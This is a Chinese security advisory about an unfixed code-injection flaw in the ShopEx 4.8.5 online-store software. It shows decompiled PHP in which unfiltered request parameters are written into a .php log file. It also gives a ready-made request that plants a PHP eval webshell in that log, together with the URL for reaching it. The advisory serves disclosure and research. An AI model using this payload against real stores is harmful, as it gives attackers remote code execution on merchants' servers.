影响版本:
shopex 4.8.5.45144
漏洞描述:
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。

\core\include_v5\crontab.php （zend加密后的，我只发布解密后的代码）

01 public function  run( )
02                 {
03                                 $this->logFile = HOME_DIR."/logs/access.log.php";
04                                 $this->now = time( );
05                                 $this->viewStat( );
06                                 $messenger =& $this->loadModel( "system/messenger" );
07                                 $messenger->runQueue( );
08                 }
09 
10                 public function viewStat( )
11                 {
12                                 if ( !file_exists( $this->logFile ) )
13                                 {
14                                                 file_put_contents( $this->logFile, "#<?php exit()?>\n" );   //囧之处！By：小翔
15                                 }
16                                 if ( isset( $_GET['action'] ) )
17                                 {
18                                                 error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile );//没有任何过滤，By：小翔
<*参考
http://www.t00ls.net/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
直接提交：http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在：http://127.0.0.1/shopex/home/logs/access.log.php
SEBUG安全建议:
厂商补丁：

ShopEx.cn
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
www.ShopEx.cn